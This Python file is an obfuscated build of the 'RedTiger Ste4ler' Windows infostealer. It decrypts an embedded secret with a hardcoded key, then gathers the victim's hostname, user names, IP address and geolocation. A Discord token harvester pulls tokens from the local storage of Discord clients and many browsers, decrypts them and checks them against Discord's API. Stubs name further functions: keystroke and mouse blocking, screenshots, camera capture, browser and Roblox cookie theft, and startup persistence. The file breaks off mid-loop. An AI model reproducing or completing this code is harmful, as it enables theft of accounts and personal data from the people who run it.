
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: LXXUWBRKBHDJUFSVDVCRLCRYGVRHJBHXPTADPYWLDSDAHESWIYVGOBJHVNZPWZPUTIQTIIJZHIBGVFWSZKWFAGWWNCIQMNFO = On1y_W1nd0w5()
except: LXXUWBRKBHDJUFSVDVCRLCRYGVRHJBHXPTADPYWLDSDAHESWIYVGOBJHVNZPWZPUTIQTIIJZHIBGVFWSZKWFAGWWNCIQMNFO = False

if LXXUWBRKBHDJUFSVDVCRLCRYGVRHJBHXPTADPYWLDSDAHESWIYVGOBJHVNZPWZPUTIQTIIJZHIBGVFWSZKWFAGWWNCIQMNFO == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ_data = base64.b64decode(KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ)
    v4r_salt = KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ_data[:16]
    v4r_iv = KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ_data[16:32]
    KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ_data = KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(KQNGIRQJEZZNSRGJBHAGMMXBEUDTIVZGRQQZZIPJWOKAIVLMWBWUMHOQVDDRBECRXLSLGVLKQESSNUDGWZ_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

MVHUIGOBHNSHYXIYVZNCUHWCVPUWUUZVEUMHWFTPCUYMXXFKEVZPJPH = r"""
tlyymM8yj8DpmpvIyjODdUidWtRDvnrmeiPsOyOOXWqmSAoie090t7IEUVLRy9nRT4l+8pdkH5mnvYKfKT/S9kafjm36I/hhQ53Kf3azvpH0FhxV2sxI5/U7QEezGU4MP6DMhI+EeTeFjoMgZ/mJdq8Ta/OTuIBnWxTNuVOfhArav/lYE0rX26sQw46+vbajsPvOEhyiv4AHkkvq4DE+rA==
"""
FHTBIMYFSAKAHIQNZWPJJLKYNUKWRXOEZSBEPORNIFZRWQVRSFFMOOIYVMCJLZQWNTJCQMYM = "fEsMJCZlDaIACXMcTcTWTBOCEwsyIIjYsXsPOXhGlTvATsAlBKxabevtPnptxfLFVyzkxmqxwqESgQTQNSiHJaRQVljlZGkXUBmWdKeiasiXYfGYLvcDrnyyqSJighs"
PXQYVNRRWXCQHTNRFOHMEUOUZFDGHALLBUZTPJLPWEARNDJFALQOFKZTLNYA = "redtiger.shop"
KBZJTQSDRYZVEHFZDDQNYFYDMDCRLTBLEHHYOBWEZEADTEVKMAZLOAGXEBVJHGOADPANRDED = 0xa80505
XKXJBWQQEPDFFGSTROLMMXLPGVEBOWYXZLEVUXERWPMQLGJJIFJZZMJXOTJISBGIPYRQEARNXWQGPHKFPUZALAMXPMN = "RedTiger Ste4ler"
FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
ZWBDJHUEEYOZSFFWTNRUZSOKQJIWEQJPTVKFJVGBULBYJEQXUSBWVCGHRQSBFGGKZKMIFLOYAVMCBFWTPFFDVS = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
CRLELZZJOMYWSOCSHNIPKSNRLARJSQMRIYBWQFONPDOBPRQPLLTVGPHHMYNSAIZOUMYKOYSYFYTGPUHKMEJLKHWJMXNICPNPSA = {
        "text": ZWBDJHUEEYOZSFFWTNRUZSOKQJIWEQJPTVKFJVGBULBYJEQXUSBWVCGHRQSBFGGKZKMIFLOYAVMCBFWTPFFDVS,
        "icon_url": FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI,
        }
                 
UIGKKQMJAYHAAQSCTOJCDKCKFCPFINTHBJLZEVZXQTIRNZGGWNSPHTNFTUVYNUI = Decrypt(MVHUIGOBHNSHYXIYVZNCUHWCVPUWUUZVEUMHWFTPCUYMXXFKEVZPJPH, FHTBIMYFSAKAHIQNZWPJJLKYNUKWRXOEZSBEPORNIFZRWQVRSFFMOOIYVMCJLZQWNTJCQMYM)

try: YUGITEIGMEGHVCKMGIGTVSFIFOSAXGRSJVAPFWYOWRDDEJGCDIYJUDXGRYIGJWWQTXO = socket.gethostname()
except: YUGITEIGMEGHVCKMGIGTVSFIFOSAXGRSJVAPFWYOWRDDEJGCDIYJUDXGRYIGJWWQTXO = "None"

try: BHQWYHPFKNMZCKQDMSPFHACZRNPOXAXCWHUEUAPBQMFBRVJUQJXVKATNGRQVMCUJFZOLDYLIWPTDO = os.getlogin()
except: BHQWYHPFKNMZCKQDMSPFHACZRNPOXAXCWHUEUAPBQMFBRVJUQJXVKATNGRQVMCUJFZOLDYLIWPTDO = "None"

try: EAEGRYFSIDTLJDPFACLWMOMMZFZYVTWZVAXBLDWYWDZFJVDCGZHEVNZTTGHXAREDXIKYANDH = win32api.GetUserNameEx(win32api.NameDisplay)
except: EAEGRYFSIDTLJDPFACLWMOMMZFZYVTWZVAXBLDWYWDZFJVDCGZHEVNZTTGHXAREDXIKYANDH = "None"

try: FFPQBJKKPSLHVOCLMLQUBRSWWHWHKWYQYRJDUFLYIESVNZBYANOVTCDBXQS = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: FFPQBJKKPSLHVOCLMLQUBRSWWHWHKWYQYRJDUFLYIESVNZBYANOVTCDBXQS = "None"

try: UCGVPEOGIJNVYQXQXIYQLMFIVODRHJKFBFBQOPJTIECXVAIIMHGVVTWBVURWVCFTBMSQETUOPPHHLYGPSURSOD = socket.gethostbyname(socket.gethostname())
except: UCGVPEOGIJNVYQXQXIYQLMFIVODRHJKFBFBQOPJTIECXVAIIMHGVVTWBVURWVCFTBMSQETUOPPHHLYGPSURSOD = "None"

try:
    UOOBNXPONXIILKORXVLXUYUIAGWBSWHXMDGLXLNCWAOLBZLTMFLVHOBISEH = requests.get(f"https://{PXQYVNRRWXCQHTNRFOHMEUOUZFDGHALLBUZTPJLPWEARNDJFALQOFKZTLNYA}/api/ip/ip={FFPQBJKKPSLHVOCLMLQUBRSWWHWHKWYQYRJDUFLYIESVNZBYANOVTCDBXQS}")
    FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU = UOOBNXPONXIILKORXVLXUYUIAGWBSWHXMDGLXLNCWAOLBZLTMFLVHOBISEH.json()

    BZATWDIVJVMNUWTNEGCQAFVBJTYCFHDCJVTXPUVEWIMBFTEAJGIXJEDKHDXOVEKENMQHZJGCEYFHAROEZXTBDWL = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('country', "None")
    BZATWDIVJVMNUWTNEGCQAFVBJTYCFHDCJVTXPUVEWIMBFTEAJGIXJEDKHDXOVEKENMQHZJGCEYFHAROEZXTBDWL_code = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('country_code', "None")
    SCEQCFUNTSGHASSSIVDYUZKGMYSPHZSMUPLTETHYTLMKXDYMWJUSBSZJZTESJRRUSCGB = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('region', "None")
    SCEQCFUNTSGHASSSIVDYUZKGMYSPHZSMUPLTETHYTLMKXDYMWJUSBSZJZTESJRRUSCGB_code = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('region_code', "None")
    EPVQKHNFWHOFQRMSNWHKDTLFJGKIELYOEXUFOQPUFDONQBZKTVNVAHQQEXTWCIZMICXOTFXWMITRQNKSIGWOGNUVVWTE = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('zip', "None")
    GYQTLAEPQQMWJUZACGPPKBPFPRRWYWNZQTLGPTNKCRPYCOHLNJWJYNHGZCKNUDWHNNXPWVKKWXEYWOUISOVSFXPTXVVUZJSWCN = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('city', "None")
    ZRSHPXICKHGTOIPTEETUHRWXRWVVNGAXICPNAHZTAEDYTLVKJIFAPBBQYHCJWPOVWMCQXKNLZFZMTZPIATQWSATXLCWWQQZMOKR = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('latitude', "None")
    JXRJZFCYFEFHLUWJTLTWRTXTJMIOKDEDWIRRFNORLTQHZDETIWMGTAFVVHCSNYBZJJBWJXORIIPXUTZDDRWDHZLTXLIXPZDB = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('longitude', "None")
    NGOTSCKMPFPJFAXVUSVIFGUTXXOBXVJZHLKPGLYZXZBJDLRVISLBPQF = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('timezone', "None")
    QZNEYWCXDFIJFELTMNDOGKZZMRWGEASXBQICUNBJYCTTWYHJBLIUDVSZLOWRH = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('isp', "None")
    IAUSNNQOQDXGJKURCWOHMSZJIYAYFKLZSSKXRWHFKZLQHTJGGKJVNZJVCHSOXBGA = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('org', "None")
    TTGMSLMUGAIEWJXLHNBQMYULHCEEZCXQCCIYOLBQOQQBWYZCLEJUYSVUXUANZE = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('as', "None")
except:
    UOOBNXPONXIILKORXVLXUYUIAGWBSWHXMDGLXLNCWAOLBZLTMFLVHOBISEH = requests.get(f"http://ip-api.com/json/{FFPQBJKKPSLHVOCLMLQUBRSWWHWHKWYQYRJDUFLYIESVNZBYANOVTCDBXQS}")
    FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU = UOOBNXPONXIILKORXVLXUYUIAGWBSWHXMDGLXLNCWAOLBZLTMFLVHOBISEH.json()

    BZATWDIVJVMNUWTNEGCQAFVBJTYCFHDCJVTXPUVEWIMBFTEAJGIXJEDKHDXOVEKENMQHZJGCEYFHAROEZXTBDWL = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('country', "None")
    BZATWDIVJVMNUWTNEGCQAFVBJTYCFHDCJVTXPUVEWIMBFTEAJGIXJEDKHDXOVEKENMQHZJGCEYFHAROEZXTBDWL_code = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('countryCode', "None")
    SCEQCFUNTSGHASSSIVDYUZKGMYSPHZSMUPLTETHYTLMKXDYMWJUSBSZJZTESJRRUSCGB = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('regionName', "None")
    SCEQCFUNTSGHASSSIVDYUZKGMYSPHZSMUPLTETHYTLMKXDYMWJUSBSZJZTESJRRUSCGB_code = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('region', "None")
    EPVQKHNFWHOFQRMSNWHKDTLFJGKIELYOEXUFOQPUFDONQBZKTVNVAHQQEXTWCIZMICXOTFXWMITRQNKSIGWOGNUVVWTE = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('zip', "None")
    GYQTLAEPQQMWJUZACGPPKBPFPRRWYWNZQTLGPTNKCRPYCOHLNJWJYNHGZCKNUDWHNNXPWVKKWXEYWOUISOVSFXPTXVVUZJSWCN = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('city', "None")
    ZRSHPXICKHGTOIPTEETUHRWXRWVVNGAXICPNAHZTAEDYTLVKJIFAPBBQYHCJWPOVWMCQXKNLZFZMTZPIATQWSATXLCWWQQZMOKR = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('lat', "None")
    JXRJZFCYFEFHLUWJTLTWRTXTJMIOKDEDWIRRFNORLTQHZDETIWMGTAFVVHCSNYBZJJBWJXORIIPXUTZDDRWDHZLTXLIXPZDB = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('lon', "None")
    NGOTSCKMPFPJFAXVUSVIFGUTXXOBXVJZHLKPGLYZXZBJDLRVISLBPQF = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('timezone', "None")
    QZNEYWCXDFIJFELTMNDOGKZZMRWGEASXBQICUNBJYCTTWYHJBLIUDVSZLOWRH = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('isp', "None")
    IAUSNNQOQDXGJKURCWOHMSZJIYAYFKLZSSKXRWHFKZLQHTJGGKJVNZJVCHSOXBGA = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('org', "None")
    TTGMSLMUGAIEWJXLHNBQMYULHCEEZCXQCCIYOLBQOQQBWYZCLEJUYSVUXUANZE = FMTKPDKHUSKMCZRTGPQKSUOIBJKLRRWVJMLXNINEFYZFBBKRCJHNFTDCARTIVNAZZNQFXUNNFZNYSJGU.get('as', "None")

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF = "https://discord.com/api/v9/users/@me"
        PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU = os.getenv("localappdata")
        DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL = os.getenv("appdata")
        ADTLPCYNAYBZFVDYHIOPKIGPDWPQTLYNNBMSVVTOEHLPYZNRNE = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        ADTLPCYNAYBZFVDYHIOPKIGPDWPQTLYNNBMSVVTOEHLPYZNRNE_enc = r"dQw4w9WgXcQ:[^\"]*"
        JPNJEVIFSTTMRXNARGAPBWTNWYTFNFFWYGLBWSDDRHJRTAZBZXCWBQRBDNDVMUWOVNUYBGLEGCDRFWZOUGUTHCRWSJDQBWUBUUQP = []
        VOHAWAMSGXDQWRGZKYITPIXBSRUQTTRLCBDGUCTWVOJGHLORTQYHLEVKROZDATPFGZX = []
        IYYUAPKRALZEUNOKHKWVXIKICGLDTRVXTQHXWAUPVDNKDVNLDVSWEAOBLDWHVUGMQNGQMTUMCX = {}

        BOVBUJYXSWYLZLXXPZPBNTIABPFBCJWIYFEKGVCHYFZTSTEADUNWSMOXPEQCFWNP = {
            'Discord': DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': PNVVJHDYCPVSHDCYVOOUJUSZTVHQSHWYHIEHYLAEMCRFHLAEEHOPILPALUTU + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for ZTWHZCVGRFKBDPZGHFCNZQDAXUXKCDABAZONXIXPTSXXYHDIFBPCREQXLBBYLUIQDBKGTIHRETDCIDJKWHTFGJAKYYC, QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ in BOVBUJYXSWYLZLXXPZPBNTIABPFBCJWIYFEKGVCHYFZTSTEADUNWSMOXPEQCFWNP.items():
            if not os.path.exists(QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ):
                continue
            IHRHINMLBQDKCUWKXMDXJLGNFPIBRVXXJSRMQHGKWRHITTTVTFKIRENVSU = ZTWHZCVGRFKBDPZGHFCNZQDAXUXKCDABAZONXIXPTSXXYHDIFBPCREQXLBBYLUIQDBKGTIHRETDCIDJKWHTFGJAKYYC.replace(" ", "").lower()
            if "cord" in QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ:
                if not os.path.exists(DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + f'\\{IHRHINMLBQDKCUWKXMDXJLGNFPIBRVXXJSRMQHGKWRHITTTVTFKIRENVSU}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{QYDLRJXMCKWZTAYRDUWVLAITWVTPSALNJDGDCFFUVLNHUQDRRPJQWBERQMCSEDQILOCGVKNIXWDTOREHERDJ}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(ADTLPCYNAYBZFVDYHIOPKIGPDWPQTLYNNBMSVVTOEHLPYZNRNE_enc, v4r_line.strip()):
                                PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(DFWLKRNYWFPNAEXLAVTKVFGPERLTHTOEDHWRTVCHTDCCDUCSJJOOWRFXVONONMNRMCVHYZSMDNTSKOSWXYVBREJDOSEVIJL + f'\\{IHRHINMLBQDKCUWKXMDXJLGNFPIBRVXXJSRMQHGKWRHITTTVTFKIRENVSU}\\Local State'))
                                if validate_t0k3n(PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA, JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF):
                                    YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD = requests.get(JFUUHNJRLDRGTUKPUNWMCWWKDYVOECHYVJNPNURVPUVWJMZTBLMZKPCFGHFKRENHGLJJAOCTCIHSJETBCJABOTMPECAMF, headers={'Authorization': PGCFQNMABRFVFVXYVZSFZXIPEDNTDYBVUOQNIJTHKDSOKWACVOGWLERTIDHOJELUZAFLCKQHSHZADSYWMA}).json()['id']
                                    if YRHUMSJLRFVTMBCBLZKZJXSFRHIQKXKYCBHCAYRMSEIGZRFNJQMZARNPDEZSUMPKQDTSCLOXHIWYNEMVAOADXILEVQQACD not in VOHAWAMSGXDQWRGZKYITPIXBSRUQTTRLCBDGUCTWVOJGHLORTQYHLEVKROZDATPFGZX:
